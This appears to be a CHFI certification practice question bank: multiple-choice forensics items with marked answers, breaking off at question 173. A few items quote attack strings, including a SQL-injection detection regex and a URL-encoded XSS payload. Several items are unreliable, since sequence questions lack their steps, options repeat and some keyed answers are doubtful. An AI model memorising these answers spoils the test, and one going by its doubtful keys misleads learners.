Cybersecurity Training

Computer Hacking Forensic Investigator (CHFI) Exam Practice

Showing 1-877 of 877 questions
Question 1

Which forensic imaging tool is pre-installed on many Linux distributions?

A.
dd
Correct Answer
B.
EnCase
C.
FTK Imager
D.
Autopsy
Question 2

Harry has collected a suspicious executable file from an infected system and seeks to reverse its machine code to instructions written in assembly language. Which tool should he use for this purpose?

A.
HashCalc
B.
oledump
C.
BinText
D.
Ollydbg
Correct Answer
Question 3

Callen, a forensics officer, was tasked with investigating a recent security incident at an organization. To protect the evidence, Callen maintained a logbook of the project to record observations related to the evidence, used tagging to uniquely identify any evidence, and created a chain of custody record. Identify the investigation step performed by Callen in the above scenario.

A.
Data analysis
B.
Search and seizure
C.
Case analysis
D.
Evidence preservation
Correct Answer
Question 4

Which of the following techniques involves the analysis of logs to detect and study an incident that may have already occurred in a network or device?

A.
Cryptanalysis
B.
Social engineering
C.
Postmortem
Correct Answer
D.
Steganalysis
Question 5

What does "slack space" refer to in a file system?

A.
Space between files on disk
B.
Unused space within a file cluster
Correct Answer
C.
Deleted file fragments
D.
Empty clusters within a file
Question 6

Which tool can be used to detect rogue devices on a network?

A.
Nmap
Correct Answer
B.
Autopsy
C.
EnCase
D.
FTK Imager
Question 7

What does the superblock in Linux define?

A.
available space
B.
file synonyms
C.
location of the first inode
Correct Answer
D.
disk geometry
Question 8

The following regular expression can be used for detecting a typical SQL injection attack: /\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix Identify the signature in the above expression that searches for the word “or” with various combinations of its hex values (both uppercase and lowercase combinations).

A.
%27)|'
B.
\w*
C.
Union
D.
((%6F)|o|(%4F))((%72)|r|(%52))
Correct Answer
Question 9

Which of the following cloud computing threats arises from improper resource isolation, data storage in multiple jurisdictions, and lack of knowledge on jurisdictions?

A.
Subpoena and e-discovery
B.
Compliance risks
Correct Answer
C.
Inadequate infrastructure design and planning
D.
Unknown risk profile
Question 10

Which type of attack relies on intercepting and altering communications between two parties?

A.
DoS
B.
Phishing
C.
Keylogging
D.
Man-in-the-Middle
Correct Answer
Question 11

Which of the following Azure logs are a type of Azure platform logs that record information on the Azure subscription layer as well as the write operations performed on Azure resources?

A.
Azure Resource Logs
B.
Azure Activity Logs
Correct Answer
C.
Network Security Group Flow Logs
D.
Azure Active Directory Reports
Question 12

The file content of evidence files can be viewed using the View Pane. The View pane provides several tabs to view file content. Which of these tabs provides native views of formats supported by Oracle Outside In technology?

A.
Picture tab
B.
Hex tab
C.
Text tab
D.
Doc tab
Correct Answer
Question 13

As a Computer Hacking Forensic Investigator, you are analyzing an intrusion incident involving fileless malware delivered via a malicious Word document through phishing. What is the most effective step to disrupt the infection chain?

A.
Implementing a strict policy on macros embedded in Office documents across the organization
Correct Answer
B.
Disabling the use of all scripting languages, such as JavaScript, in the corporate environment
C.
Replacing the traditional antivirus solution with the latest signature-based IDS
D.
Patching vulnerabilities in Flash and Java plugins in all browsers within the corporate network
Question 14

Williams collected evidence, eliminated the root cause, and closed attack vectors. Which phase is this?

A.
Eradication
Correct Answer
B.
Incident triage
C.
Preparation for incident handling and response
D.
Post-incident activities
Question 15

Which approach helps identify relay systems and gathers data from forensic events?

A.
Fingerprint-based approach
Correct Answer
B.
Event aggregation
C.
Vulnerability-based approach
D.
Event de-duplication
Question 16

Which attack exploits "http" to access unauthorized directories?

A.
Unvalidated input
B.
Buffer overflow
C.
Denial of service (DoS)
D.
Path traversal
Correct Answer
Question 17

Which EDRM stage involves policies to handle/safeguard electronic data?

A.
Information governance
Correct Answer
B.
Identification
C.
Preservation
D.
Collection
Question 18

What field is a lay witness considered an expert in?

A.
Legal issues
B.
No particular field
Correct Answer
C.
Technical forensics
D.
Judging character
Question 19

In which RAID level is disk mirroring done?

A.
RAID Level 5
B.
RAID Level 3
C.
RAID Level 0
D.
RAID Level 1
Correct Answer
Question 20

What does ARP stand for?

A.
Application Routing Path
B.
Automated Routing Protocol
C.
Address Resolution Protocol
Correct Answer
D.
Address Reallocation Process
Question 21

Which service helps identify the domain of an IP and its point of contact?

A.
HashMyFiles
B.
WhatChanged Portable
C.
ARIN Whois
Correct Answer
D.
Logcat
Question 22

What is the main purpose of digital evidence preservation?

A.
Maintain integrity for legal proceedings
Correct Answer
B.
Speed up analysis
C.
Ensure confidentiality
D.
Encrypt all data
Question 23

What is a cold boot attack?

A.
Infecting system during boot
B.
BIOS vulnerability exploit
C.
Exploiting data remnants in RAM
Correct Answer
D.
Restarting to wipe memory
Question 24

Which EFS component uses LPC between LSA and the kernel?

A.
EFS service
Correct Answer
B.
EFS driver
C.
EFS FSRTL
D.
CryptoAPI
Question 25

In an APT cybercrime investigation involving global devices, what is the most effective method to manage complex digital evidence?

A.
Traditional investigation of physical devices
B.
Skip legal processes
C.
Invest in powerful automated tools
Correct Answer
D.
Collaborate internationally
Question 26

Which tool extracts LM and NTLM password hashes from the SAM database?

A.
Metashield Analyzer
B.
EnCase
C.
BitLocker
D.
PwDump7
Correct Answer
Question 27

What issue arises from mishandling digital evidence during investigation?

A.
Infrastructure issues
B.
Legal issues
Correct Answer
C.
Jurisdiction issues
D.
Privacy issues
Question 28

Which Cisco IOS mnemonic indicates a packet matched a log rule in an access list?

A.
%SEC-6-IPACCESSLOGRL
B.
%SEC-4-TOOMANY
C.
%SEC-6-IPACCESSLOGP
Correct Answer
D.
%IPV6-6-ACCESSLOGP
Question 29

Which is a live forensics method?

A.
Analyzing a powered-off system
B.
Collecting RAM data
Correct Answer
C.
Cloning a disk
D.
Recovering deleted files
Question 31

Which Windows registry datatype stores encoded info?

A.
REG_DWORD
B.
REG_NONE
Correct Answer
C.
REG_SZ
D.
REG_FULL_RESOURCE_DESCRIPTOR
Question 32

What is the function of a MAC address?

A.
Encrypt traffic
B.
Provide virtual IP
C.
Identify devices at physical layer
Correct Answer
D.
Resolve domain names
Question 33

Which ISO standard addresses electronic discovery (eDiscovery)?

A.
ISO/IEC 27042
B.
ISO/IEC 27050
Correct Answer
C.
ISO/IEC 27043
D.
ISO/IEC 27041
Question 34

Xavier found the attacker used proxies and a fake identity. What challenge does this represent?

A.
Limited legal understanding
B.
Speed
C.
Evidence complexity
D.
Anonymity
Correct Answer
Question 35

What is the primary function of a honeypot?

A.
Block malicious packets
B.
Attract and analyze attackers
Correct Answer
C.
Protect the network perimeter
D.
Encrypt traffic
Question 36

Which hashing algorithms are used in forensics?

A.
MD5
B.
SHA-256
C.
SHA-1
D.
All of the above
Correct Answer
Question 37

Mike found the crime scene computer was turned off. What should he do?

A.
Turn it on and extract data
B.
Turn it on
C.
Turn it on and analyze
D.
Leave it off
Correct Answer
Question 38

Which Apache component handles routines and data exchange with clients?

A.
http_core
B.
http_protocol
Correct Answer
C.
http_request
D.
http_main
Question 39

Which tool is commonly used for network traffic analysis?

A.
Wireshark
Correct Answer
B.
FTK Imager
C.
Autopsy
D.
EnCase
Question 40

Which SSD component is volatile and enhances read/write speed?

A.
NAND flash memory
B.
DRAM
Correct Answer
C.
Controller
D.
Host interface
Question 41

Which IoT architecture layer contains hardware components like sensors, RFID tags, and readers?

A.
Edge technology layer
Correct Answer
B.
Access gateway layer
C.
Middleware layer
D.
Internet layer
Question 42

Which eDiscovery method involves creating bit-by-bit forensic images of devices?

A.
Directed collection
B.
Remote acquisition
C.
Custodian self-collection
D.
Full disk acquisition
Correct Answer
Question 43

What is the maximum length of an MD5 hash?

A.
32 bits
B.
128 bits
Correct Answer
C.
64 bits
D.
256 bits
Question 44

Which tool is used to create bit-by-bit disk images?

A.
FTK Imager
Correct Answer
B.
Nmap
C.
Nessus
D.
Wireshark
Question 45

Which tool helps recover deleted emails from Outlook and Thunderbird?

A.
EnCase
B.
LiME
C.
Paraben's E3
Correct Answer
D.
THC-Hydra
Question 46

Which file type starts with hex: 25 50 44 46?

A.
PDF
Correct Answer
B.
JPEG
C.
BMP
D.
GIF
Question 47

What is the role of a digital forensic investigator?

A.
Manage hardware
B.
Design security systems
C.
Develop software
D.
Collect, preserve, and analyze digital evidence
Correct Answer
Question 48

Which tool helps intercept and log network traffic?

A.
Honeypot
B.
Sniffer
Correct Answer
C.
Scanning
D.
Banner grabbing
Question 49

Which OWASP risk involves sending untrusted data to an interpreter?

A.
Cryptographic failures
B.
Broken access control
C.
Injection
Correct Answer
D.
Insecure design
Question 50

In evidence transfer, do sender and receiver need to record the date and time?

A.
False
B.
True
Correct Answer
Question 51

Which password-cracking technique tries every possible combination of characters?

A.
Pass-the-ticket attack
B.
Dictionary Attack
C.
Wire sniffing
D.
Brute-force attack
Correct Answer
Question 52

Which cloud service does Kellan use for scheduling interviews with automatic notifications?

A.
PaaS
B.
IaaS
C.
SaaS
Correct Answer
D.
IDaaS
Question 53

What is a primary responsibility of a forensic investigator when handling digital evidence?

A.
Take permission from all employees
B.
Create an image backup of the original evidence without tampering with it
Correct Answer
C.
Harden organization network security
D.
Keep evidence confidential from law enforcement
Question 54

What is the difference between hashing and encryption?

A.
Hashing is reversible; encryption is not
B.
Encryption requires a key; hashing does not
Correct Answer
C.
Hashing uses symmetric keys; encryption does not
D.
Both are used to securely transmit data
Question 55

Which tool helps in extracting data from a smartwatch for forensic investigation?

A.
Autopsy
Correct Answer
B.
Sysdig
C.
Pacu
D.
S3Inspector
Question 56

Which type of malware replicates itself to spread across systems?

A.
Virus
B.
Spyware
C.
Worm
Correct Answer
D.
Adware
Question 57

Which protocol is used to securely transfer files over the Internet?

A.
SFTP
Correct Answer
B.
HTTP
C.
FTP
D.
TFTP
Question 58

What is the hex equivalent of the character `)` in the URL-encoded string `%3Cscript%3Ealert%28XSS%29%3C%2Fscript%3E`?

A.
<
B.
>
C.
)
Correct Answer
D.
(
Question 59

Which Azure CLI command is used to provide time-specific read-only access to a snapshot?

A.
az snapshot grant-access
Correct Answer
B.
az vm show
C.
az storage blob show
D.
az snapshot delete
Question 60

Which methodology is best for acquiring volatile data from a live Linux system with limited physical access?

A.
Using Belkasoft Live RAM Capturer
B.
Performing remote acquisition using dd and netcat
Correct Answer
C.
Performing local acquisition using the LiME tool
D.
Using the fmem module and dd command
Question 61

Which investigation step has Kannon performed when securing devices affected during an attack for further investigation?

A.
Case analysis
B.
Search and seizure
Correct Answer
C.
Data acquisition
D.
Data analysis
Question 62

Which of the following is NOT a common type of digital evidence?

A.
Social media posts
B.
Emails
C.
Documents
D.
Hardware components
Correct Answer
Question 63

What is the main advantage of using cloud-based forensic tools?

A.
Scalability and remote accessibility
Correct Answer
B.
Always online availability
C.
Cost reduction
D.
Data encryption
Question 64

Which log file type contains records of all system events on a Windows machine?

A.
Security Log
B.
Application Log
C.
System Log
Correct Answer
D.
Audit Log
Question 65

What is the primary function of volatile memory?

A.
Long-term data storage
B.
Storing backup data
C.
Maintaining log files
D.
Running active processes
Correct Answer
Question 66

Which method do attackers often use to compress, encrypt, or modify a malware executable file to avoid detection?

A.
File fingerprinting
B.
Malware disassembly
C.
Performing string search
D.
Obfuscation
Correct Answer
Question 67

What type of external attack is performed when an attacker uses deceptive emails to obtain sensitive information?

A.
Phishing
Correct Answer
B.
Tailgating
C.
Espionage
D.
Brute-force
Question 68

Which approach helps investigators identify if a system serves as a relay to a hacker and helps gather forensic event data?

A.
Fingerprint-based approach
Correct Answer
B.
Event de-duplication
C.
Vulnerability-based approach
D.
Event aggregation
Question 69

In the context of malware analysis, what does a sandbox environment provide?

A.
Permanent system changes
B.
A controlled space to execute and analyze malware
Correct Answer
C.
Direct hardware access
D.
Faster execution of processes
Question 70

Which file signature verification utility helps check the integrity of critical files on Windows?

A.
Netstat
B.
Sigverif
Correct Answer
C.
Process monitor
D.
Windows Service Manager
Question 71

Which of the following is a common type of cyberattack?

A.
SQL injection
B.
All of the above
Correct Answer
C.
Phishing
D.
DDoS
Question 72

What type of malware captures keystrokes?

A.
Keylogger
Correct Answer
B.
Worm
C.
Spyware
D.
Adware
Question 73

Identify the correct sequence of steps involved in the forensic acquisition of an Amazon EC2 instance.

A.
2 → 1 → 4 → 3 → 6 → 5
B.
1 → 4 → 5 → 6 → 3 → 2
C.
6 → 1 → 5 → 2 → 3 → 4
D.
5 → 3 → 1 → 6 → 4 → 2
Correct Answer
Question 74

Which section of the ACPO Principles of Digital Evidence states that no action should change data that may be relied upon in court?

A.
Principle 3
B.
Principle 2
C.
Principle 4
D.
Principle 1
Correct Answer
Question 75

Identify the malware distribution technique in which attackers use tactics to improve the ranking of malware pages.

A.
Blackhat search engine optimization
Correct Answer
B.
Social engineered clickjacking
C.
Drive-by downloads
D.
Spear phishing sites
Question 76

Which command is used to delete a file in Linux?

A.
mkdir
B.
rm
Correct Answer
C.
del
D.
rmdir
Question 77

The role of a forensic investigator is to:

A.
Create an image backup of the original evidence without tampering with potential evidence
Correct Answer
B.
Keep the evidence highly confidential and hide it from law enforcement agencies
C.
Harden organizational network security
D.
Take permission from all employees of the organization for investigation
Question 78

Which of the following would NOT typically be acquired during the dead acquisition technique?

A.
Unallocated drive space
B.
Active network connections
Correct Answer
C.
Boot sectors
D.
Web browser cache
Question 79

Printing under a Windows Computer normally requires which one of the following file types to be created?

A.
EMF
Correct Answer
B.
MEM
C.
CME
D.
EME
Question 80

For the purpose of cracking password-protected files, Bob initiated a technique that attempts every combination of characters. Identify the technique.

A.
Brute-force attack
Correct Answer
B.
Wire sniffing
C.
Dictionary Attack
D.
Pass-the-ticket attack
Question 81

Which protocol is used by networked systems to translate domain names into IP addresses?

A.
SMTP
B.
DHCP
C.
ARP
D.
DNS
Correct Answer
Question 82

Which of the following challenges of cybercrime is demonstrated by an attacker using proxies and a fake identity?

A.
Evidence size and complexity
B.
Anonymity
Correct Answer
C.
Limited legal understanding
D.
Speed
Question 83

Which of the following commands will help John get the count of all NetBIOS names resolved by broadcast by querying a WINS server?

A.
nbtstat -n
B.
nbtstat -S
C.
nbtstat -r
Correct Answer
D.
nbtstat -n
Question 84

Which component of an SSD is volatile memory and requires power to retain data?

A.
Host interface
B.
NAND flash memory
C.
DRAM
Correct Answer
D.
Controller
Question 85

Kevin used Tor browser for illegal activities. Which type of web was accessed by Kevin?

A.
Indexed web
B.
Dark web
Correct Answer
C.
Surface web
D.
Deep web
Question 86

Which Windows command can list all active processes?

A.
tracert
B.
netstat
C.
tasklist
Correct Answer
D.
ipconfig
Question 87

Maria wants to see if an executable file adds or modifies any registry values after execution. Which event ID should she look for in Windows Event Viewer?

A.
Event ID 4657
Correct Answer
B.
Event ID 4688
C.
Event ID 7040
D.
Event ID 4624
Question 88

Which of the following Azure logs records information on the Azure subscription layer and write operations on Azure resources?

A.
Azure Active Directory Reports
B.
Azure Activity Logs
Correct Answer
C.
Azure Resource Logs
D.
Network Security Group Flow Logs
Question 89

Which online service helps forensic investigators determine the domain name of an IP address and obtain the point of contact for the domain?

A.
WhatChanged Portable
B.
Logcat
C.
HashMyFiles
D.
ARIN Whois
Correct Answer
Question 90

Which U.S. law requires financial institutions to protect customer information against security threats?

A.
FISMA
B.
SOX
C.
HIPAA
D.
GLBA
Correct Answer
Question 91

Which Tor relay is used for transmitting data in an encrypted format and passing it from the entry relay to the exit relay?

A.
Middle relay
Correct Answer
B.
Guard relay
C.
Exit relay
D.
Entry relay
Question 92

Which investigation step did Callen perform by maintaining a logbook, tagging evidence, and creating a chain of custody record?

A.
Search and seizure
B.
Evidence preservation
Correct Answer
C.
Data analysis
D.
Case analysis
Question 93

What activity did James perform by obtaining documented permission from the device owner to conduct the investigation?

A.
Seeking consent
Correct Answer
B.
Searches without a warrant
C.
Obtaining a warrant for search and seizure
D.
Obtaining witness signatures
Question 94

Which command allows investigators to mount an APFS image and view its contents on a Linux system?

A.
fsutil
B.
strings
C.
losetup
Correct Answer
D.
wevtutil
Question 95

What methodology is most suitable for acquiring volatile data from a live Linux system with limited physical access?

A.
Using the fmem module and dd command locally to access RAM
B.
Performing remote acquisition of volatile data using dd and netcat
Correct Answer
C.
Performing local acquisition using the LiME tool
D.
Using Belkasoft Live RAM Capturer
Question 96

What obfuscation method did the attacker use by utilizing “%0b” characters to bypass firewall protection?

A.
White space manipulation
Correct Answer
B.
Replaced keywords
C.
In-line comment
D.
Double encoding
Question 97

Which artifact helps an investigator explore the Tor browser when it is uninstalled or installed in a location other than the Windows desktop?

A.
Rp.log Files
B.
PDF Files
C.
Prefetch Files
Correct Answer
D.
Image Files
Question 98

Which is the correct sequence of stages involved in the first response by laboratory forensic staff?

A.
5 -> 4 -> 2 -> 1 -> 6 -> 5
B.
3 -> 2 -> 1 -> 4 -> 5 -> 6
C.
1 -> 5 -> 6 -> 3 -> 2 -> 4
D.
3 -> 5 -> 4 -> 1 -> 6 -> 2
Correct Answer
Question 99

Which dcfldd command is used by investigators to compare an image file to the original medium (like a drive or partition)?

A.
dd if=/dev/sdb | split –b 650m - image_sdb
B.
dcfldd if=/dev/sda split=2M of=usbimg hash=md5 hashlog=usbhash.log
C.
dcfldd if=/dev/sda vf=image.dd
Correct Answer
D.
dcfldd if=/dev/sda of=usbimg.dat
Question 100

Which technique is used by attackers to confuse and mislead the forensic investigation process, including log tampering, false email headers, timestamp modification, and file header modifications?

A.
Trial obfuscation
Correct Answer
B.
HTML injection
C.
File fingerprinting
D.
Rule-based attack
Question 101

In Java, which process enables low memory consumption and quick start-up times by using a single instance of the Dalvik Virtual Machine?

A.
init
B.
Zygote
Correct Answer
C.
Daemon
D.
Media server
Question 102

Which registry datatype in a Windows system is used for storing encoded information?

A.
REG_DWORD
B.
REG_FULL_RESOURCE_DESCRIPTOR
C.
REG_SZ
D.
REG_NONE
Correct Answer
Question 103

Which of the following is NOT a valid hashing algorithm?

A.
AES
Correct Answer
B.
MD5
C.
SHA-256
D.
SHA-1
Question 104

Which technique involves analyzing logs to detect and study an incident that has already occurred in a network or device?

A.
Postmortem
Correct Answer
B.
Social engineering
C.
Steganalysis
D.
Cryptanalysis
Question 105

Which aspect of the Tor network should an investigator focus on primarily to trace the origin of a data transmission?

A.
The Entry/Guard Relay, as it provides an entry point to the Tor network
B.
The Middle Relay, as it transmits the data in an encrypted format
C.
The Exit Relay, as it sends the data to the destination server
Correct Answer
D.
The Tor Bridge Node, as it helps to circumvent restrictions on the Tor network
Question 106

Which registry location stores Tor browser artifacts and can provide information on user activities on the dark web?

A.
HKEY_USERS<SID>\SOFTWARE\Mozilla\Firefox\Launcher
Correct Answer
B.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
C.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles{GUID}
D.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\BagMRU
Question 107

In which forensic data acquisition step do investigators overwrite data with sequential zeros or ones to protect it from recovery?

A.
Sanitize the target media
Correct Answer
B.
Acquiring volatile data
C.
Validating data acquisition
D.
Planning for contingency
Question 108

Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file?

A.
MFT
B.
Sector
C.
Metadata
D.
Slack Space
Correct Answer
Question 109

What is the primary role of a write blocker in digital forensics?

A.
Allow modifications to the original drive
B.
Prevent writing to a target drive
Correct Answer
C.
Encrypt forensic images
D.
Ensure faster data transfer
Question 110

Joey, a forensics analyst, found a security event with Event ID 4758 while analyzing logs. What event did Joey identify?

A.
A security-enabled universal group was deleted.
Correct Answer
B.
A member was added to a security-enabled universal group.
C.
A security-enabled universal group was changed.
D.
A security-enabled universal group was deleted.
Question 111

What is the default port for SSH?

A.
21
B.
23
C.
443
D.
22
Correct Answer
Question 112

In which step of forensic readiness planning do investigators determine what happens to potential evidence data and its impact on the business?

A.
Keep an incident response team ready to review the incident and preserve the evidence.
B.
Establish a policy for securely handling and storing the collected evidence.
C.
Identify the potential evidence required for an incident.
D.
Determine the sources of evidence.
Correct Answer
Question 113

Which practice is associated with scene assessment in ENFSI best practices for forensic examination?

A.
Conduct a preliminary risk assessment of the seized exhibits and record any issues
B.
Conduct an initial evaluation of the case before the formal assessment to check and discuss organizational requirements and potential risks
C.
Proactively develop and arrange pre-scene preparations so that forensic laboratory staff can perform their responsibilities in a timely manner
D.
Process the seized exhibits based on the laboratory policy
Correct Answer
Question 114

Which of the following AWS services helps forensic investigators to monitor and analyze various log sources, such as Amazon S3 logs, CloudTrail management event logs, DNS logs, etc., to identify security threats?

A.
XRY LOGICAL
B.
Autopsy
C.
ModSecurity
D.
GuardDuty
Correct Answer
Question 115

Which of the following types of jailbreaks allows users to reboot the iOS device any number of times because after every reboot, the device gets jailbroken automatically?

A.
Semi-untethered jailbreak
B.
Semi-tethered jailbreak
C.
Tethered jailbreak
D.
Untethered jailbreak
Correct Answer
Question 116

What is the primary purpose of timestamps in digital forensics?

A.
Encrypt sensitive data
B.
Prevent unauthorized access to data
C.
Verify the time of file creation, modification, and access
Correct Answer
D.
Compress evidence data
Question 117

Identify the `dcfldd` command that investigators use to compare an image file to the original medium, such as a drive or partition.

A.
dd if=/dev/sdb | split –b 650m - image_sdb
B.
dcfldd if=/dev/sda vf=image.dd
Correct Answer
C.
dcfldd if=/dev/sda split=2M of=usbimg hash=md5 hashlog=usbhash.log
D.
dcfldd if=/dev/sda of=usbimg.dat
Question 118

What is the primary purpose of the tool Cain & Abel in forensic investigations?

A.
File recovery
B.
Password recovery
Correct Answer
C.
Network scanning
D.
Disk imaging
Question 119

Which of the following eDiscovery team members performs the deployment of tools on a suspected computer machine and configures, implements, and maintains the deployed tools?

A.
IT Support Personnel
B.
eDiscovery Attorney
C.
eDiscovery Software Expert
Correct Answer
D.
Processing/Review Personnel
Question 120

Identify the correct sequence of steps involved in the forensic acquisition of persistent disk volumes (GCP):

A.
3 → 2 → 4 → 1
Correct Answer
B.
4 → 3 → 2 → 1
C.
1 → 2 → 3 → 4
D.
2 → 3 → 1 → 4
Question 121

In the `netstat` command, which parameter is used to display active TCP connections and includes the Process ID (PID) for each connection?

A.
-r
B.
-o
Correct Answer
C.
-n
D.
-p
Question 122

Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where 'x' represents the ________.

A.
Original file name's extension
B.
Drive name
Correct Answer
C.
Original file name
D.
Sequential number
Question 123

Which forensic technique is used to reconstruct a file system from damaged storage media?

A.
Keyword search
B.
File carving
Correct Answer
C.
Steganalysis
D.
Timeline analysis
Question 124

What does the 'traceroute' command do?

A.
Detects open ports on a target system
B.
Sniffs packets in real time
C.
Measures network bandwidth
D.
Identifies the path packets take to reach a destination
Correct Answer
Question 125

Which Linux command can be used to view all active network connections?

A.
iptables
B.
df
C.
netstat
Correct Answer
D.
top
Question 126

Which of the following PowerPoint streams contains information about the presentation layout and its contents?

A.
Current user stream
B.
Summary information streams
C.
PowerPoint document stream
Correct Answer
D.
Pictures stream
Question 127

Which of the following fields of an IIS log entry can be reviewed to determine whether a request made by a client is fulfilled without an error?

A.
cs-method
B.
cs(User-Agent)
C.
sc-status
Correct Answer
D.
cs-username
Question 128

Which Windows command is used to check the IP configuration of a system?

A.
ipconfig
Correct Answer
B.
traceroute
C.
netstat
D.
ping
Question 129

What is the role of the forensic investigator?

A.
Keep the evidence confidential and hide it from law enforcement
B.
Take permission from all employees
C.
Harden network security
D.
Create an image backup of the original evidence without tampering
Correct Answer
Question 130

What type of analysis is performed when reviewing DNS cache to check domain contact attempts?

A.
Power analysis
B.
Cryptanalysis
C.
System behavior analysis
D.
Network behavior analysis
Correct Answer
Question 131

Which tool assists investigators in retrieving deleted emails from Outlook and Thunderbird?

A.
THC-Hydra
B.
Encase
C.
LiME
D.
Paraben's E3
Correct Answer
Question 132

Identify the SQLite file that contains logged-in users on Alexa devices and gets cleared upon logout.

A.
DataStore.db
B.
map_data_storage.db
Correct Answer
C.
complications.db
D.
gservices.db
Question 133

Which Azure CLI command provides time-limited read-only access to a snapshot?

A.
az vm show
B.
az snapshot grant-access
Correct Answer
C.
az storage blob show
D.
az snapshot delete
Question 134

Which of the following tools is used for recovering deleted files?

A.
Recuva
Correct Answer
B.
Nessus
C.
Nmap
D.
OpenVAS
Question 135

After snapshotting a malware-infected EC2 instance, what should the forensics team do next?

A.
Terminate the instance after taking necessary backup
Correct Answer
B.
Pause the running instance
C.
Keep the instance running
D.
Terminate all instances in the VPC
Question 136

In cases involving APTs, what's the best way to manage complex digital evidence?

A.
Invest in powerful automated tools
Correct Answer
B.
Bypass legal requirements
C.
Use traditional local device analysis
D.
Collaborate with international law enforcement
Question 137

Which forensic technique involves hashing and comparing binaries?

A.
Malware Disassembly
B.
Identifying file dependencies
C.
File fingerprinting
Correct Answer
D.
String search
Question 138

Which attack exploits a buffer overflow?

A.
Ransomware
B.
DoS
C.
Code injection
Correct Answer
D.
SQL Injection
Question 139

What does TSK stand for in digital forensics?

A.
Traceroute System Key
B.
The Sleuth Kit
Correct Answer
C.
Temporal Storage Keeper
D.
Timely Security Key
Question 140

Which command converts E01 image files to dd format on Linux?

A.
wevtutil
B.
losetup -f
C.
xmount
Correct Answer
D.
lsblk
Question 141

Which is NOT a characteristic of volatile memory?

A.
Retains data after power loss
Correct Answer
B.
Found in RAM
C.
Data must be collected immediately
D.
Used for running processes
Question 142

Which tool allows forensic investigators to perform Apache log analysis?

A.
FaceNiff
B.
Halberd
C.
iStumbler
D.
GoAccess
Correct Answer
Question 143

What is a common tool used for network traffic analysis?

A.
FTK Imager
B.
EnCase
C.
Autopsy
D.
Wireshark
Correct Answer
Question 144

What data acquisition method is used when collecting evidence from a powered-off system?

A.
Data backup
B.
Dead acquisition
Correct Answer
C.
Volatile data acquisition
D.
Live acquisition
Question 145

Which is NOT a common type of digital evidence?

A.
Physical fingerprints
Correct Answer
B.
Email messages
C.
Social media posts
D.
Hard drive data
Question 146

Which of the following is a common cyberattack?

A.
DDoS
B.
SQL injection
C.
Phishing
D.
All of the above
Correct Answer
Question 147

What do security cameras, badges, and fire extinguishers represent in a forensics lab?

A.
Planning and budgeting
B.
Physical/structural design
C.
Work area considerations
D.
Physical security considerations
Correct Answer
Question 148

The offset in a hexadecimal code is:

A.
First byte after the colon
B.
0x at end of code
C.
0x at the beginning of the code
Correct Answer
D.
Last byte after the colon
Question 149

Which tool shows related modules in an executable and builds a tree of functions?

A.
ResourcesExtract
B.
Dependency Walker
Correct Answer
C.
VirusTotal
D.
OllyDbg
Question 150

Which incident response phase includes eliminating the root cause and closing attack vectors?

A.
Incident triage
B.
Preparation
C.
Eradication
Correct Answer
D.
Post-incident activities
Question 151

What is the right combo of Event IDs for account creation, privilege escalation, and service install?

A.
624, 4670, 6011
B.
4720, 500, 6011
C.
4720, 4672, 7045
Correct Answer
D.
624, 500, 7045
Question 152

Which tool identifies file extension mismatches to assist forensic investigations?

A.
Autopsy
Correct Answer
B.
Stream Detector
C.
zteg
D.
StegoHunt
Question 153

Which `nbtstat` command gets the count of NetBIOS names resolved by broadcast?

A.
nbtstat -n
B.
nbtstat -n
C.
nbtstat -S
D.
nbtstat -r
Correct Answer
Question 154

What does 'anti-forensics' refer to?

A.
Methods used to obstruct forensic investigations
Correct Answer
B.
Automated forensic tools
C.
Recovering deleted files
D.
Bypassing encryption
Question 155

Which registry keys track a user's folder viewing preferences?

A.
Superblocks
B.
Slack space
C.
ShellBags
Correct Answer
D.
Spotlight
Question 156

Which Event ID shows allowed connection via UDP/TCP by Windows Filtering Platform?

A.
Event ID 5156
Correct Answer
B.
4660 and 4663
C.
7045 and 4657
D.
4688
Question 157

Which is a volatile storage medium?

A.
SSD
B.
USB drive
C.
RAM
Correct Answer
D.
HDD
Question 158

What is the process of recovering deleted files from storage?

A.
Data recovery
Correct Answer
B.
Data wiping
C.
Data encryption
D.
Data compression
Question 159

What is the smallest allocation unit on a hard disk made up of multiple sectors?

A.
Track
B.
Sector
C.
4Platter
D.
Cluster
Correct Answer
Question 160

A lay witness is considered an expert in what field?

A.
Forensics
B.
Legal issues
C.
No particular field
Correct Answer
D.
Judging character
Question 161

Which correlation approach compares all fields systematically for both positive and negative matches?

A.
Automated field correlation
Correct Answer
B.
Codebook-based
C.
Field-based
D.
Rule-based
Question 162

Which event log type is used by batch servers executing processes without user interaction?

A.
10
B.
4
Correct Answer
C.
11
D.
3
Question 163

Where in the registry are Tor browser artifacts stored?

A.
Shell\BagMRU
B.
HKEY_USERS<SID>\SOFTWARE\Mozilla\Firefox\Launcher
Correct Answer
C.
NetworkList\Profiles
D.
Classes\exefile
Question 164

Which tool helps reverse machine code to assembly?

A.
HashCalc
B.
BinText
C.
Ollydbg
Correct Answer
D.
oledump
Question 165

Which ISO standard covers electronic discovery processes?

A.
ISO/IEC 27041
B.
ISO/IEC 27042
C.
ISO/IEC 27043
D.
ISO/IEC 27050
Correct Answer
Question 166

What should a forensics team do after taking an EBS snapshot of a compromised EC2 instance?

A.
Pause the instance
B.
Terminate all in VPC
C.
Terminate after backup
Correct Answer
D.
Keep it running
Question 167

Which Federal Rule promotes fair trials and efficiency in evidence law?

A.
Rule 801
B.
Rule 102
Correct Answer
C.
Rule 105
D.
Rule 1003
Question 168

What's a common method to detect rootkits?

A.
File integrity monitoring
Correct Answer
B.
Browser history analysis
C.
Packet capture
D.
Disk imaging
Question 169

What defines how investigators are expected to act during cases?

A.
Lawful interception
B.
TTPs
C.
Code of ethics
Correct Answer
D.
System baselining
Question 170

What describes an organization’s ability to efficiently handle digital evidence?

A.
Forensic readiness
Correct Answer
B.
Trial obfuscation
C.
Chain of custody
D.
Vulnerability assessment
Question 171

What is a common Linux file system?

A.
HFS+
B.
NTFS
C.
ext4
Correct Answer
D.
FAT32
Question 172

Which layer in the IoT architecture consists of hardware components, including sensors, RFID tags, and readers?

A.
Middleware layer
B.
Edge technology layer
Correct Answer
C.
Internet layer
D.
Access gateway layer
Question 173

Which tool allows forensic investigators to extract web activity information such as event timestamp, port, server status code, etc.?

A.
Suphacap
B.
HttpLogBrowser
